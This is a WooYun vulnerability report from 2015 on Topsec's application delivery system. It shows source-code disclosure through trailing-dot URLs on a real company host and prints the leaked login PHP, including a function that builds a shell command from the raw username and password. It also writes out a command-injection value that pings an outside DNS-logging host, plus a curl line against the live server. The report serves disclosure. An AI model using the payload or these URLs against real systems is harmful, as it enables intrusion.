当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0105415

漏洞标题:天融信应用交付系统源码泄漏+用cloudeye神器秒杀命令执行

相关厂商:天融信

漏洞作者: Alen

提交时间:2015-04-02 18:46

修复时间:2015-05-24 18:08

公开时间:2015-05-24 18:08

漏洞类型:敏感信息泄露

危害等级:中

自评Rank:8

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-02: 细节已通知厂商并且等待厂商处理中
2015-04-09: 厂商已经确认,细节仅向厂商公开
2015-04-19: 细节向核心白帽子及相关领域专家公开
2015-04-29: 细节向普通白帽子公开
2015-05-09: 细节向实习白帽子公开
2015-05-24: 细节向公众公开

简要描述:

天融信应用交付系统源码泄漏
天融信1995年成立,总部设在北京。作为中国信息安全行业领导企业,多年来天融信人凭借着高度民族使命感和责任感,秉承“融天下英才、筑可信网络”的人才理念,成功打造出中国信息安全产业领先品牌TOPSEC。

详细说明:

http://mail.topsec.com.cn:8888/login.php. 
http://mail.topsec.com.cn:8888/login_check.php. 
http://mail.topsec.com.cn:8888/logout.php. 
http://mail.topsec.com.cn:8888/redirect.php.


<?php
include_once dirname(__FILE__)."/acc/common/uiResources.inc";
require_once dirname(__FILE__)."/acc/common/config/item/configItem.inc";
require_once dirname(__FILE__)."/acc/common/constant.inc";
$error = $_REQUEST['error'];
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML xmlns="http://www.w3.org/1999/xhtml"><HEAD>
<META http-equiv=Content-Type content="text/html; charset=utf-8">
<TITLE>
<?php echo PRODUCT_NAME_STRING?>
</TITLE>
<meta http-equiv="pragram" content="no-cache">
<meta http-equiv="expires" content="0">
<STYLE type=text/css>
BODY {
	MARGIN: 0px;
	background-color: #ffffff;
}
input.SmallButtonStyle
{
	color: #FFFFFF;
	background:#017BC4;
	font:bold 14px Arial;
	width: 70px;
	height:30px;
	border-width :3px;
	border-style:ridge;
	border-color:#CCCCCC;
	vertical-align:middle;
	text-align:center;
	cursor: pointer;
}
.style10 {
	font-size: 13px;
	color: #FFFFFF;
}
</STYLE>
<LINK href="css/css.css" type=text/css rel=stylesheet>
<META content="MSHTML 6.00.2900.3314" name=GENERATOR>
<script language="javascript" src="js/prototype.js"></script>
<script>
	function go(){
		new Ajax.Request($('loginForm').action, {
			parameters: "userName=" + $F('userName') + "&password=" + $F('pwd'),
			onSuccess:function(r){
			alert(r.responseText);
				var d = r.responseText.evalJSON(true);
				var str = $F('err' + d.code);
				if(d.code == 0){
					if(confirm(d.user + str)){
						window.location = 'redirect.php';
					}else{
						window.location = 'logout.php';
					}
				}else if(d.code == 1){
					alert(str);
				}else{
					window.location = 'redirect.php';
				}
			}
		});
	}
	Event.observe(window, 'load', function(){
		$('userName').focus();
		<?php if(isset($error)){?>
			alert($F('err1'));
		<?php }?>
	});
</script>
<style type="text/css">
<!--
.style11 {color: #017BC4}
-->
</style>
</HEAD>
<BODY>
<span class="style11"></span>
<input type="hidden" id="err0" value="<?php echo LOGIN_INTERRUPT?>"/>
<input type="hidden" id="err1" value="<?php echo LOGIN_ERROR_STRING?>"/>
<input type="hidden" id="err2" value=""/>
<table width="100%" height="90%">
	<tr align="center">
	  <td height="360">
			<table width="460" height="275" background="images/login-background.jpg">
				<tr>
				  <td width="44" height="90" align="center">&nbsp;</td>
				  <td width="181" height="90" align="center"></td>
			      <td width="219" vAlign="bottom"  align="right">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td>
			  </tr>
				<tr>
				  <td height="22" align="center">&nbsp;</td>
				  <td height="22" align="center">&nbsp;</td>
		          <TD ><!-- #EndLibraryItem --></TD>
			  </tr>
				<tr>
				  <td height="38" align="center">&nbsp;</td>
				  <td height="38" colspan="2" align="center">
				  <CENTER>
				  <FORM action="login_check.php" id="loginForm" method=post>
<TABLE border=0>
  <TBODY>
  <TR align=middle>
    <TD width="97" align="right"><strong><?php echo INDEX_USERNAME_STRING ?>:</strong></TD>
    <TD width="230"><INPUT style="width:200px;"  id=userName size=28 name='userName'></TD>
    </TR>
  <TR align=middle>
    <TD align="right"><strong><?php echo INDEX_PASSWORD_STRING ?>:</strong></TD>
    <TD><INPUT style="width:200px; " id="pwd" type=password size=28 name='password'></TD>
    </TR>
  <TR align=middle>
    <TD height="44"   colspan="1">	</TD>
    <TD align="left"><INPUT type='image'  src='<?php echo LOGIN_IMAGE ?>' align="top"  value="aaaa" ></INPUT></TD>
    </TR></TBODY></TABLE>
</FORM></CENTER></td>
		      </tr>
				<tr>
				  <td height="27" align="center">&nbsp;</td>
				  <td height="27" align="center">&nbsp;</td>
			      <td align="center">&nbsp;</td>
			  </tr>
	    </table>
	  </td>
	</tr>
</table>
<TABLE cellSpacing=0 cellPadding=0 width=1024 border=0>
  <TBODY>
  <TR>
    <TD align=middle height=46><span class="style10">&copy;</span><FONT
      color=white><B>
      <?php
        echo PAGE_COPYRIGHT_STRING;
      ?>
      &nbsp;
</B></FONT></TD></TR></TBODY></TABLE></BODY></HTML>


<?php 
	require_once dirname ( __FILE__ ) . '/acc/common/log/LogUtil.inc';
	
	session_start();
	/*
	$remoteIp = $_SERVER['REMOTE_ADDR'];
    file_put_contents("/tmp/loginIp", $remoteIp);
    $user = $_SESSION['userInfo'];
    syslog(LOG_INFO, "$user login from $remoteIp");
    */
	logger('auth', 'User Auth', LOG_ACTION_LOGIN);
	header("Location:/");
?>


<?php
	require_once dirname ( __FILE__ ) . '/acc/common/log/LogUtil.inc';
	session_start();
	logger('auth', 'User Auth', LOG_ACTION_LOGOUT);
	$remote = $_SERVER['REMOTE_ADDR'];// . ':' . $_SERVER['REMOTE_PORT'];
	$line = file_get_contents('/tmp/loginIp');
	
	if($remote == $line)
    	file_put_contents("/tmp/loginIp", '');
    $user = $_SESSION['userInfo'];
	syslog(LOG_INFO, "$user logout from $remoteIp");
	$_SESSION = array();
	if (isset($_COOKIE[session_name()])) {
	    setcookie(session_name(), '', time()-42000, '/');
	}
	session_destroy();
	header("Location:/");
?>


<?php
require_once dirname ( __FILE__ ) . "/acc/common/uiResources.inc";
require_once dirname ( __FILE__ ) . "/acc/common/userManager.inc";
require_once dirname ( __FILE__ ) . '/acc/common/commandWrapper.inc';
    session_start();
    $userManager = new UserManager();
    $userName = "";
	$password = "";
    if(isset($_REQUEST["userName"])){
		$userName = $_REQUEST["userName"];
		$password = $_REQUEST["password"];    	
    }  
    if($userManager->certificateUser($userName,$password)){
	    header("location: redirect.php");
    }else{
    	header("location: login.php?error=1");
    }
?>


1.png

2.png


太复杂了,看代码不爽,直接黑盒搞个命令执行看看

; ping 333d61.dnslog.info; echo


topsec123.jpg


1.png


漏洞证明:

curl 'http://mail.topsec.com.cn:888login_check.php.'
<?php
require_once dirname ( __FILE__ ) . "/acc/common/uiResources.inc";
require_once dirname ( __FILE__ ) . "/acc/common/userManager.inc";
require_once dirname ( __FILE__ ) . '/acc/common/commandWrapper.inc';
    session_start();
    $userManager = new UserManager();
    $userName = "";
	$password = "";
    if(isset($_REQUEST["userName"])){
		$userName = $_REQUEST["userName"];
		$password = $_REQUEST["password"];    	
    }  
    if($userManager->certificateUser($userName,$password)){
	    header("location: redirect.php");
    }else{
    	header("location: login.php?error=1");
    }
?>


public function certificateUser($user,$pass){
        $logined = false;
        
        //if(strcasecmp($user,"admin")!=0){
        //    return false;
        //}
		
        $validateUserPassFormat= APPEX_CMD_LOC.'ckpwd %s %s';
        $command = sprintf($validateUserPassFormat,$user,$pass);
        $result = execute($command);
        $status = $result->get('retValue');
        if($status ==0){
            $_SESSION['userInfo']=$user;
            $userDao = new UserDao();
			$user = $userDao->getUserFromUserName($user);
			$_SESSION['userType']=$user->getUserType();
            $logined = true;
        }
        return $logined;
    }


修复方案:

版权声明:转载请注明来源 Alen@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-04-09 18:07

厂商回复:

感谢您的漏洞报送,产品问题正在修复中。

最新状态:

暂无